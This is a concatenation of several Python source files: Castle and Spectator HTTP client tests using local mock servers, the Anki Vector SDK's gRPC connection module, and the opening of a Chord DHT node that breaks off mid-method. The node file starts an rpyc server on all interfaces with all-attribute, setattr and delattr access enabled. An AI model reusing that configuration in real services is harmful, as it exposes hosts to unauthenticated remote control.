import threading from requests import Response import responses from castle.test import unittest from castle.core.send_request import CoreSendRequest from castle.configuration import configuration try: from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer except ImportError: from http.server import BaseHTTPRequestHandler, HTTPServer def run_server(): class SimpleHandler(BaseHTTPRequestHandler): def do_POST(self): body = '{"action":"allow", "user_id": "123"}'.encode() self.send_response(201) self.send_header('content-type', 'application/json') self.send_header('content-length', len(body)) self.end_headers() self.wfile.write(body) server = HTTPServer(('', 65521), SimpleHandler) httpd_thread = threading.Thread(target=server.serve_forever) httpd_thread.setDaemon(True) httpd_thread.start() return httpd_thread class CoreSendRequestTestCase(unittest.TestCase): def test_init_headers(self): headers = {'X-Castle-Client-Id': '1234'} self.assertEqual(CoreSendRequest(headers).headers, headers) def test_init_base_url(self): self.assertEqual(CoreSendRequest().base_url, 'https://api.castle.io/v1') @responses.activate def test_build_query(self): data = {'event': '$login.authenticate', 'user_id': '12345'} configuration.api_secret = 'api_secret' # JSON requires double quotes for its strings response_text = {"action": "allow", "user_id": "12345"} responses.add( responses.POST, 'https://api.castle.io/v1/authenticate', json=response_text, status=200 ) res = CoreSendRequest().build_query('post', 'authenticate', data) self.assertIsInstance(res, Response) self.assertEqual(res.status_code, 200) self.assertEqual(res.json(), response_text) configuration.api_secret = None def test_connection_pooled(self): configuration.base_url = 'http://localhost:65521' run_server() request = CoreSendRequest() data = {'event': '$login.authenticate', 'user_id': '12345'} response = request.build_query('post', 'authenticate', data) num_pools = len(response.connection.poolmanager.pools.keys()) configuration.base_url = 'https://api.castle.io/v1' self.assertEqual(num_pools, 1) def test_build_url(self): self.assertEqual( CoreSendRequest().build_url('authenticate'), 'https://api.castle.io/v1/authenticate' ) def test_build_url_with_port(self): configuration.base_url = 'http://api.castle.local:3001' self.assertEqual( CoreSendRequest().build_url('test'), 'http://api.castle.local:3001/test' ) def test_verify_true(self): self.assertEqual(CoreSendRequest().verify(), True) def test_verify_false(self): configuration.base_url = 'http://api.castle.io' self.assertEqual(CoreSendRequest().verify(), False) configuration.base_url = 'https://api.castle.io/v1'
test_http.py
import gzip import io import json import logging import threading import unittest from spectator import Registry from spectator.http import HttpClient try: from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler except ImportError: # python3 from http.server import HTTPServer from http.server import BaseHTTPRequestHandler logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s') class HttpTest(unittest.TestCase): def setUp(self): self._server = HTTPServer(("localhost", 0), RequestHandler) self._uri = "http://localhost:{}/path".format(self._server.server_port) t = threading.Thread(target=self._server.serve_forever) t.start() def tearDown(self): self._server.shutdown() self._server.server_close() def test_do_post_ok(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": 200}', retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "2xx", "statusCode": "200" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_404(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": 404}', retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "4xx", "statusCode": "404" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_429(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": 429}', retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "4xx", "statusCode": "429" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_503(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": 503}', retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "5xx", "statusCode": "503" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_bad_json(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": ', retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "4xx", "statusCode": "400" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_encode(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, {"status": 202}, retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "2xx", "statusCode": "202" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_network_error(self): self.tearDown() r = Registry() client = HttpClient(r) client.post_json(self._uri, "{}", retry_delay=0) tags = { "mode": "http-client", "method": "POST", "client": "spectator-py", "status": "URLError", "statusCode": "URLError" } t = r.timer("http.req.complete", tags) self.assertEqual(t.count(), 1) def test_do_post_no_logging(self): r = Registry() client = HttpClient(r) client.post_json(self._uri, '{"status": 429}', retry_delay=0, disable_logging=False) class RequestHandler(BaseHTTPRequestHandler): @staticmethod def _compress(entity): out = io.BytesIO() with gzip.GzipFile(fileobj=out, mode="w") as f: f.write(entity.encode('utf-8')) return out.getvalue() def do_POST(self): try: length = int(self.headers['Content-Length']) entity = io.BytesIO(self.rfile.read(length)) data = json.loads(gzip.GzipFile(fileobj=entity).read().decode()) self.send_response(data["status"]) self.send_header('Content-Encoding', 'gzip') self.end_headers() self.wfile.write(self._compress("received: {}".format(data))) except Exception as e: self.send_response(400) self.end_headers() msg = "error processing request: {}".format(e) self.wfile.write(msg.encode('utf-8')) def log_message(self, format, *args): pass
connection.py
# Copyright (c) 2018 Anki, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License in the file LICENSE.txt or at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Management of the connection to and from Vector. """ # __all__ should order by constants, event classes, other classes, functions. __all__ = ['ControlPriorityLevel', 'Connection', 'on_connection_thread'] import asyncio from concurrent import futures from enum import Enum import functools import inspect import logging import platform import sys import threading import time from typing import Any, Awaitable, Callable, Coroutine, Dict, List from google.protobuf.text_format import MessageToString import grpc import aiogrpc from . import util from .exceptions import (connection_error, VectorAsyncException, VectorBehaviorControlException, VectorConfigurationException, VectorControlException, VectorControlTimeoutException, VectorInvalidVersionException, VectorNotFoundException) from .messaging import client, protocol from .version import __version__ class ControlPriorityLevel(Enum): """Enum used to specify the priority level for the program.""" #: Runs above mandatory physical reactions, will drive off table, perform while on a slope, #: ignore low battery state, work in the dark, etc. OVERRIDE_BEHAVIORS_PRIORITY = protocol.ControlRequest.OVERRIDE_BEHAVIORS # pylint: disable=no-member #: Runs below Mandatory Physical Reactions such as tucking Vector's head and arms during a fall, #: yet above Trigger-Word Detection. Default for normal operation. DEFAULT_PRIORITY = protocol.ControlRequest.DEFAULT # pylint: disable=no-member #: Holds control of robot before/after other SDK connections #: Used to disable idle behaviors. Not to be used for regular behavior control. RESERVE_CONTROL = protocol.ControlRequest.RESERVE_CONTROL # pylint: disable=no-member class _ControlEventManager: """This manages every :class:`asyncio.Event` that handles the behavior control system. These include three events: granted, lost, and request. :class:`granted_event` represents the behavior system handing control to the SDK. :class:`lost_event` represents a higher priority behavior taking control away from the SDK. :class:`request_event` Is a way of alerting :class:`Connection` to request control. """ def __init__(self, loop: asyncio.BaseEventLoop = None, priority: ControlPriorityLevel = None): self._granted_event = asyncio.Event(loop=loop) self._lost_event = asyncio.Event(loop=loop) self._request_event = asyncio.Event(loop=loop) self._has_control = False self._priority = priority self._is_shutdown = False @property def granted_event(self) -> asyncio.Event: """This event is used to notify listeners that control has been granted to the SDK.""" return self._granted_event @property def lost_event(self) -> asyncio.Event: """Represents a higher priority behavior taking control away from the SDK.""" return self._lost_event @property def request_event(self) -> asyncio.Event: """Used to alert :class:`Connection` to request control.""" return self._request_event @property def has_control(self) -> bool: """Check to see that the behavior system has control (without blocking by checking :class:`granted_event`)""" return self._has_control @property def priority(self) -> ControlPriorityLevel: """The currently desired priority for the SDK.""" return self._priority @property def is_shutdown(self) -> bool: """Detect if the behavior control stream is supposed to shut down.""" return self._is_shutdown def request(self, priority: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY) -> None: """Tell the behavior stream to request control via setting the :class:`request_event`. This will signal Connection's :func:`_request_handler` generator to send a request control message on the BehaviorControl stream. This signal happens asynchronously, and can be tracked using the :class:`granted_event` parameter. :param priority: The level of control in the behavior system. This determines which actions are allowed to interrupt the SDK execution. See :class:`ControlPriorityLevel` for more information. """ if priority is None: raise VectorBehaviorControlException("Must provide a priority level to request. To disable control, use {}.release().", self.__class__.__name__) self._priority = priority self._request_event.set() def release(self) -> None: """Tell the behavior stream to release control via setting the :class:`request_event` while priority is ``None``. This will signal Connection's :func:`_request_handler` generator to send a release control message on the BehaviorControl stream. This signal happens asynchronously, and can be tracked using the :class:`lost_event` parameter. """ self._priority = None self._request_event.set() def update(self, enabled: bool) -> None: """Update the current state of control (either enabled or disabled) :param enabled: Used to enable/disable behavior control """ self._has_control = enabled if enabled: self._granted_event.set() self._lost_event.clear() else: self._lost_event.set() self._granted_event.clear() def shutdown(self) -> None: """Tells the control stream to shut down. This will return control to the rest of the behavior system. """ self._has_control = False self._granted_event.set() self._lost_event.set() self._is_shutdown = True self._request_event.set() class Connection: """Creates and maintains a aiogrpc connection including managing the connection thread. The connection thread decouples the actual messaging layer from the user's main thread, and requires any network requests to be ran using :func:`asyncio.run_coroutine_threadsafe` to make them run on the other thread. Connection provides two helper functions for running a function on the connection thread: :func:`~Connection.run_coroutine` and :func:`~Connection.run_soon`. This class may be used to bypass the structures of the python sdk handled by :class:`~anki_vector.robot.Robot`, and instead talk to aiogrpc more directly. The values for the cert_file location and the guid can be found in your home directory in the sdk_config.ini file. .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() :param name: Vector's name in the format of "Vector-XXXX". :param host: The IP address and port of Vector in the format "XX.XX.XX.XX:443". :param cert_file: The location of the certificate file on disk. :param guid: Your robot's unique secret key. :param behavior_control_level: pass one of :class:`ControlPriorityLevel` priority levels if the connection requires behavior control, or None to decline control. """ def __init__(self, name: str, host: str, cert_file: str, guid: str, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY): if cert_file is None: raise VectorConfigurationException("Must provide a cert file to authenticate to Vector.") self._loop: asyncio.BaseEventLoop = None self.name = name self.host = host self.cert_file = cert_file self._interface = None self._channel = None self._has_control = False self._logger = util.get_class_logger(__name__, self) self._control_stream_task = None self._control_events: _ControlEventManager = None self._guid = guid self._thread: threading.Thread = None self._ready_signal: threading.Event = threading.Event() self._done_signal: asyncio.Event = None self._conn_exception = False self._behavior_control_level = behavior_control_level self.active_commands = [] @property def loop(self) -> asyncio.BaseEventLoop: """A direct reference to the loop on the connection thread. Can be used to run functions in on thread. .. testcode:: import anki_vector import asyncio async def connection_function(): print("I'm running in the connection thread event loop.") with anki_vector.Robot() as robot: asyncio.run_coroutine_threadsafe(connection_function(), robot.conn.loop) :returns: The loop running inside the connection thread """ if self._loop is None: raise VectorAsyncException("Attempted to access the connection loop before it was ready") return self._loop @property def thread(self) -> threading.Thread: """A direct reference to the connection thread. Available to callers to determine if the current thread is the connection thread. .. testcode:: import anki_vector import threading with anki_vector.Robot() as robot: if threading.current_thread() is robot.conn.thread: print("This code is running on the connection thread") else: print("This code is not running on the connection thread") :returns: The connection thread where all of the grpc messages are being processed. """ if self._thread is None: raise VectorAsyncException("Attempted to access the connection loop before it was ready") return self._thread @property def grpc_interface(self) -> client.ExternalInterfaceStub: """A direct reference to the connected aiogrpc interface. This may be used to directly call grpc messages bypassing :class:`anki_vector.Robot` .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() """ return self._interface @property def behavior_control_level(self) -> ControlPriorityLevel: """Returns the specific :class:`ControlPriorityLevel` requested for behavior control. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This property identifies the enumerated level of behavior control that the SDK will maintain over the robot. For more information about behavior control, see :ref:`behavior <behavior>`. .. code-block:: python import anki_vector with anki_vector.Robot() as robot: print(robot.conn.behavior_control_level) # Will print ControlPriorityLevel.DEFAULT_PRIORITY robot.conn.release_control() print(robot.conn.behavior_control_level) # Will print None """ return self._behavior_control_level @property def requires_behavior_control(self) -> bool: """True if the :class:`Connection` requires behavior control. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This boolean signifies that the :class:`Connection` will try to maintain control of Vector's behavior system even after losing control to higher priority robot behaviors such as returning home to charge a low battery. For more information about behavior control, see :ref:`behavior <behavior>`. .. code-block:: python import time import anki_vector def callback(robot, event_type, event): robot.conn.request_control() print(robot.conn.requires_behavior_control) # Will print True robot.anim.play_animation_trigger('GreetAfterLongTime') robot.conn.release_control() with anki_vector.Robot(behavior_control_level=None) as robot: print(robot.conn.requires_behavior_control) # Will print False robot.events.subscribe(callback, anki_vector.events.Events.robot_observed_face) # Waits 10 seconds. Show Vector your face. time.sleep(10) """ return self._behavior_control_level is not None @property def control_lost_event(self) -> asyncio.Event: """This provides an :class:`asyncio.Event` that a user may :func:`wait()` upon to detect when Vector has taken control of the behavior system at a higher priority. .. testcode:: import anki_vector async def auto_reconnect(conn: anki_vector.connection.Connection): await conn.control_lost_event.wait() conn.request_control() """ return self._control_events.lost_event @property def control_granted_event(self) -> asyncio.Event: """This provides an :class:`asyncio.Event` that a user may :func:`wait()` upon to detect when Vector has given control of the behavior system to the SDK program. .. testcode:: import anki_vector async def wait_for_control(conn: anki_vector.connection.Connection): await conn.control_granted_event.wait() # Run commands that require behavior control """ return self._control_events.granted_event def request_control(self, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY, timeout: float = 10.0): """Explicitly request behavior control. Typically used after detecting :func:`control_lost_event`. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This function will acquire control of Vector's behavior system. This will raise a :class:`VectorControlTimeoutException` if it fails to gain control before the timeout. For more information about behavior control, see :ref:`behavior <behavior>` .. testcode:: import anki_vector async def auto_reconnect(conn: anki_vector.connection.Connection): await conn.control_lost_event.wait() conn.request_control(timeout=5.0) :param timeout: The time allotted to attempt a connection, in seconds. :param behavior_control_level: request control of Vector's behavior system at a specific level of control. See :class:`ControlPriorityLevel` for more information. """ if not isinstance(behavior_control_level, ControlPriorityLevel): raise TypeError("behavior_control_level must be of type ControlPriorityLevel") if self._thread is threading.current_thread(): return asyncio.ensure_future(self._request_control(behavior_control_level=behavior_control_level, timeout=timeout), loop=self._loop) return self.run_coroutine(self._request_control(behavior_control_level=behavior_control_level, timeout=timeout)) async def _request_control(self, behavior_control_level: ControlPriorityLevel = ControlPriorityLevel.DEFAULT_PRIORITY, timeout: float = 10.0): self._behavior_control_level = behavior_control_level self._control_events.request(self._behavior_control_level) try: self._has_control = await asyncio.wait_for(self.control_granted_event.wait(), timeout) except futures.TimeoutError as e: raise VectorControlTimeoutException(f"Surpassed timeout of {timeout}s") from e def release_control(self, timeout: float = 10.0): """Explicitly release control. Typically used after detecting :func:`control_lost_event`. To be able to directly control Vector's motors, override his screen, play an animation, etc., the :class:`Connection` will need behavior control. This function will release control of Vector's behavior system. This will raise a :class:`VectorControlTimeoutException` if it fails to receive a control_lost event before the timeout. .. testcode:: import anki_vector async def wait_for_control(conn: anki_vector.connection.Connection): await conn.control_granted_event.wait() # Run commands that require behavior control conn.release_control() :param timeout: The time allotted to attempt to release control, in seconds. """ if self._thread is threading.current_thread(): return asyncio.ensure_future(self._release_control(timeout=timeout), loop=self._loop) return self.run_coroutine(self._release_control(timeout=timeout)) async def _release_control(self, timeout: float = 10.0): self._behavior_control_level = None self._control_events.release() try: self._has_control = await asyncio.wait_for(self.control_lost_event.wait(), timeout) except futures.TimeoutError as e: raise VectorControlTimeoutException(f"Surpassed timeout of {timeout}s") from e def connect(self, timeout: float = 10.0) -> None: """Connect to Vector. This will start the connection thread which handles all messages between Vector and Python. .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() :param timeout: The time allotted to attempt a connection, in seconds. """ if self._thread: raise VectorAsyncException("\n\nRepeated connections made to open Connection.") self._ready_signal.clear() self._thread = threading.Thread(target=self._connect, args=(timeout,), daemon=True, name="gRPC Connection Handler Thread") self._thread.start() ready = self._ready_signal.wait(timeout=2 * timeout) if not ready: raise VectorNotFoundException() if hasattr(self._ready_signal, "exception"): e = getattr(self._ready_signal, "exception") delattr(self._ready_signal, "exception") raise e def _connect(self, timeout: float) -> None: """The function that runs on the connection thread. This will connect to Vector, and establish the BehaviorControl stream. """ try: if threading.main_thread() is threading.current_thread(): raise VectorAsyncException("\n\nConnection._connect must be run outside of the main thread.") self._loop = asyncio.new_event_loop() asyncio.set_event_loop(self._loop) self._done_signal = asyncio.Event() if not self._behavior_control_level: self._control_events = _ControlEventManager(self._loop) else: self._control_events = _ControlEventManager(self._loop, priority=self._behavior_control_level) trusted_certs = None with open(self.cert_file, 'rb') as cert: trusted_certs = cert.read() # Pin the robot certificate for opening the channel channel_credentials = aiogrpc.ssl_channel_credentials(root_certificates=trusted_certs) # Add authorization header for all the calls call_credentials = aiogrpc.access_token_call_credentials(self._guid) credentials = aiogrpc.composite_channel_credentials(channel_credentials, call_credentials) self._logger.info(f"Connecting to {self.host} for {self.name} using {self.cert_file}") self._channel = aiogrpc.secure_channel(self.host, credentials, options=(("grpc.ssl_target_name_override", self.name,),)) # Verify the connection to Vector is able to be established (client-side) try: # Explicitly grab _channel._channel to test the underlying grpc channel directly grpc.channel_ready_future(self._channel._channel).result(timeout=timeout) # pylint: disable=protected-access except grpc.FutureTimeoutError as e: raise VectorNotFoundException() from e self._interface = client.ExternalInterfaceStub(self._channel) # Verify Vector and the SDK have compatible protocol versions version = protocol.ProtocolVersionRequest(client_version=protocol.PROTOCOL_VERSION_CURRENT, min_host_version=protocol.PROTOCOL_VERSION_MINIMUM) protocol_version = self._loop.run_until_complete(self._interface.ProtocolVersion(version)) if protocol_version.result != protocol.ProtocolVersionResponse.SUCCESS or protocol.PROTOCOL_VERSION_MINIMUM > protocol_version.host_version: # pylint: disable=no-member raise VectorInvalidVersionException(protocol_version) self._control_stream_task = self._loop.create_task(self._open_connections()) # Initialze SDK sdk_module_version = __version__ python_version = platform.python_version() python_implementation = platform.python_implementation() os_version = platform.platform() cpu_version = platform.machine() initialize = protocol.SDKInitializationRequest(sdk_module_version=sdk_module_version, python_version=python_version, python_implementation=python_implementation, os_version=os_version, cpu_version=cpu_version) self._loop.run_until_complete(self._interface.SDKInitialization(initialize)) if self._behavior_control_level: self._loop.run_until_complete(self._request_control(behavior_control_level=self._behavior_control_level, timeout=timeout)) except Exception as e: # pylint: disable=broad-except # Propagate the errors to the calling thread setattr(self._ready_signal, "exception", e) self._loop.close() return finally: self._ready_signal.set() try: async def wait_until_done(): return await self._done_signal.wait() self._loop.run_until_complete(wait_until_done()) finally: self._loop.close() async def _request_handler(self): """Handles generating messages for the BehaviorControl stream.""" while await self._control_events.request_event.wait(): self._control_events.request_event.clear() if self._control_events.is_shutdown: return priority = self._control_events.priority if priority is None: msg = protocol.ControlRelease() msg = protocol.BehaviorControlRequest(control_release=msg) else: msg = protocol.ControlRequest(priority=priority.value) msg = protocol.BehaviorControlRequest(control_request=msg) self._logger.debug(f"BehaviorControl {MessageToString(msg, as_one_line=True)}") yield msg async def _open_connections(self): """Starts the BehaviorControl stream, and handles the messages coming back from the robot.""" try: async for response in self._interface.BehaviorControl(self._request_handler()): response_type = response.WhichOneof("response_type") if response_type == 'control_granted_response': self._logger.info(f"BehaviorControl {MessageToString(response, as_one_line=True)}") self._control_events.update(True) elif response_type == 'control_lost_event': self._cancel_active() self._logger.info(f"BehaviorControl {MessageToString(response, as_one_line=True)}") self._control_events.update(False) except futures.CancelledError: self._logger.debug('Behavior handler task was cancelled. This is expected during disconnection.') def _cancel_active(self): for fut in self.active_commands: if not fut.done(): fut.cancel() self.active_commands = [] def close(self): """Cleanup the connection, and shutdown all the event handlers. Usually this should be invoked by the Robot class when it closes. .. code-block:: python import anki_vector # Connect to your Vector conn = anki_vector.connection.Connection("Vector-XXXX", "XX.XX.XX.XX:443", "/path/to/file.cert", "<guid>") conn.connect() # Run your commands async def play_animation(): # Run your commands anim = anki_vector.messaging.protocol.Animation(name="anim_pounce_success_02") anim_request = anki_vector.messaging.protocol.PlayAnimationRequest(animation=anim) return await conn.grpc_interface.PlayAnimation(anim_request) # This needs to be run in an asyncio loop conn.run_coroutine(play_animation()).result() # Close the connection conn.close() """ if self._control_events: self._control_events.shutdown() # need to wait until all Futures were cancled before going on, # otherwise python 3.8+ will raise alot of CancelledErrors and time.sleep(2) if self._control_stream_task: self._control_stream_task.cancel() self.run_coroutine(self._control_stream_task).result() self._cancel_active() if self._channel: self.run_coroutine(self._channel.close()).result() self.run_coroutine(self._done_signal.set) self._thread.join(timeout=5) self._thread = None def run_soon(self, coro: Awaitable) -> None: """Schedules the given awaitable to run on the event loop for the connection thread. .. testcode:: import anki_vector import time async def my_coroutine(): print("Running on the connection thread") with anki_vector.Robot() as robot: robot.conn.run_soon(my_coroutine()) time.sleep(1) :param coro: The coroutine, task or any awaitable to schedule for execution on the connection thread. """ if coro is None or not inspect.isawaitable(coro): raise VectorAsyncException(f"\n\n{coro.__name__ if hasattr(coro, '__name__') else coro} is not awaitable, so cannot be ran with run_soon.\n") def soon(): try: asyncio.ensure_future(coro) except TypeError as e: raise VectorAsyncException(f"\n\n{coro.__name__ if hasattr(coro, '__name__') else coro} could not be ensured as a future.\n") from e if threading.current_thread() is self._thread: self._loop.call_soon(soon) else: self._loop.call_soon_threadsafe(soon) def run_coroutine(self, coro: Awaitable) -> Any: """Runs a given awaitable on the connection thread's event loop. Cannot be called from within the connection thread. .. testcode:: import anki_vector async def my_coroutine(): print("Running on the connection thread") return "Finished" with anki_vector.Robot() as robot: result = robot.conn.run_coroutine(my_coroutine()) :param coro: The coroutine, task or any other awaitable which should be executed. :returns: The result of the awaitable's execution. """ if threading.current_thread() is self._thread: raise VectorAsyncException("Attempting to invoke async from same thread." "Instead you may want to use 'run_soon'") if asyncio.iscoroutinefunction(coro) or asyncio.iscoroutine(coro): return self._run_coroutine(coro) if asyncio.isfuture(coro): async def future_coro(): return await coro return self._run_coroutine(future_coro()) if callable(coro): async def wrapped_coro(): return coro() return self._run_coroutine(wrapped_coro()) raise VectorAsyncException("\n\nInvalid parameter to run_coroutine: {}\n" "This function expects a coroutine, task, or awaitable.".format(type(coro))) def _run_coroutine(self, coro): return asyncio.run_coroutine_threadsafe(coro, self._loop) def on_connection_thread(log_messaging: bool = True, requires_control: bool = True, is_cancellable_behavior=False) -> Callable[[Coroutine[util.Component, Any, None]], Any]: """A decorator generator used internally to denote which functions will run on the connection thread. This unblocks the caller of the wrapped function and allows them to continue running while the messages are being processed. .. code-block:: python import anki_vector class MyComponent(anki_vector.util.Component): @connection._on_connection_thread() async def on_connection_thread(self): # Do work on the connection thread :param log_messaging: True if the log output should include the entire message or just the size. Recommended for large binary return values. :param requires_control: True if the function should wait until behavior control is granted before executing. :param is_cancellable_behavior: True if the behavior can be cancelled before it has completed. :returns: A decorator which has 3 possible returns based on context: the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`~anki_vector.robot.Robot`, when the robot is an :class:`~anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively. """ def _on_connection_thread_decorator(func: Coroutine) -> Any: """A decorator which specifies a function to be executed on the connection thread :params func: The function to be decorated :returns: There are 3 possible returns based on context: the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`anki_vector.robot.Robot`, when the robot is an :class:`anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively. """ if not asyncio.iscoroutinefunction(func): raise VectorAsyncException("\n\nCannot define non-coroutine function '{}' to run on connection thread.\n" "Make sure the function is defined using 'async def'.".format(func.__name__ if hasattr(func, "__name__") else func)) @functools.wraps(func) async def log_handler(conn: Connection, func: Coroutine, logger: logging.Logger, *args: List[Any], **kwargs: Dict[str, Any]) -> Coroutine: """Wrap the provided coroutine to better express exceptions as specific :class:`anki_vector.exceptions.VectorException`s, and adds logging to incoming (from the robot) and outgoing (to the robot) messages. """ result = None # TODO: only have the request wait for control if we're not done. If done raise an exception. control = conn.control_granted_event if requires_control and not control.is_set(): if not conn.requires_behavior_control: raise VectorControlException(func.__name__) logger.info(f"Delaying {func.__name__} until behavior control is granted") await asyncio.wait([conn.control_granted_event.wait()], timeout=10) message = args[1:] outgoing = message if log_messaging else "size = {} bytes".format(sys.getsizeof(message)) logger.debug(f'Outgoing {func.__name__}: {outgoing}') try: result = await func(*args, **kwargs) except grpc.RpcError as rpc_error: raise connection_error(rpc_error) from rpc_error incoming = str(result).strip() if log_messaging else "size = {} bytes".format(sys.getsizeof(result)) logger.debug(f'Incoming {func.__name__}: {type(result).__name__} {incoming}') return result @functools.wraps(func) def result(*args: List[Any], **kwargs: Dict[str, Any]) -> Any: """The function that is the result of the decorator. Provides a wrapped function. :param _return_future: A hidden parameter which allows the wrapped function to explicitly return a future (default for AsyncRobot) or not (default for Robot). :returns: Based on context this can return the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`anki_vector.robot.Robot`, when the robot is an :class:`anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively.""" self = args[0] # Get the self reference from the function call # if the call supplies a _return_future parameter then override force_async with that. _return_future = kwargs.pop('_return_future', self.force_async) behavior_id = None if is_cancellable_behavior: behavior_id = self._get_next_behavior_id() kwargs['_behavior_id'] = behavior_id wrapped_coroutine = log_handler(self.conn, func, self.logger, *args, **kwargs) if threading.current_thread() == self.conn.thread: if self.conn.loop.is_running(): return asyncio.ensure_future(wrapped_coroutine, loop=self.conn.loop) raise VectorAsyncException("\n\nThe connection thread loop is not running, but a " "function '{}' is being invoked on that thread.\n".format(func.__name__ if hasattr(func, "__name__") else func)) future = asyncio.run_coroutine_threadsafe(wrapped_coroutine, self.conn.loop) if is_cancellable_behavior: def user_cancelled(fut): if behavior_id is None: return if fut.cancelled(): self._abort(behavior_id) future.add_done_callback(user_cancelled) if requires_control: self.conn.active_commands.append(future) def clear_when_done(fut): if fut in self.conn.active_commands: self.conn.active_commands.remove(fut) future.add_done_callback(clear_when_done) if _return_future: return future try: return future.result() except futures.CancelledError: self.logger.warning(f"{func.__name__} cancelled because behavior control was lost") return None return result return _on_connection_thread_decorator
node.py
#!/bin/python import sys import random import math import threading import rpyc from chordsite.env import * from chordsite.address import inrange from chordsite.finger_entry import FingerEntry # from rpc_server import RPC # from rpc_client import RPCClient from rpyc.utils.server import ThreadedServer # class representing a local peer # class Node(object): class Node(rpyc.Service): def __init__(self, local_address, remote_address=None): self._address = local_address # a hash map of rpc client to remote nodes, key is ip, value is the client self.remote_clients = {} # get identifier _id = self._address.__hash__() % NUM_SLOTS """ avoid collision TODO: find through remote_node to see if other node has the same id """ # while remote.getRemoteNodeByID(_id) is not None: if remote_address is not None: while self.get_remote_node(remote_address).node_id() == _id: _id = (_id + 1) % NUM_SLOTS self._id = _id # initialize successor self._successor = None # list of successors is to prevent lookup failure self._successors = [None for x in range(M_BIT)] self._predecessor_id = _id self._successor_id = _id # initialize predecessor self._predecessor = None # finger table self._finger = None self._leave = False # means that node in on the ring # TODO: to be removed when using RPC, DEPRECATED # self._remote.addToNetwork(self._id, self) # join the DHT self.join(remote_address) # in case any node depatures # self.check_predecessor() # initilize RPC server # thread = ThreadedServer(RPC(self), hostname='0.0.0.0', port=18861, protocol_config={ # 'allow_all_attrs': True # }) # self._thread = threading.Thread(target=thread.start) # self._thread.start() # print('RPC server started...') # initilize RPC server thread = ThreadedServer(self, hostname='0.0.0.0', port=18861, protocol_config={ 'allow_all_attrs': True, 'allow_setattr': True, 'allow_delattr': True, }) self._thread = threading.Thread(target=thread.start) self._thread.start() print('RPC server started...') def address(self): return self._address def exposed_address(self): return self._address # node leave def leave(self): self._leave = True # exit(0) # logging function def log(self, info): f = open("/tmp/chord.log", "a+") f.write(str(self.node_id()) + " : " + info + "\n") f.close() print(str(self.node_id()) + " : " + info) # return true if node does not leave, i.e. still in the Chord ring def ping(self): if self._leave: return False return True def exposed_ping(self): if self._leave: return False return 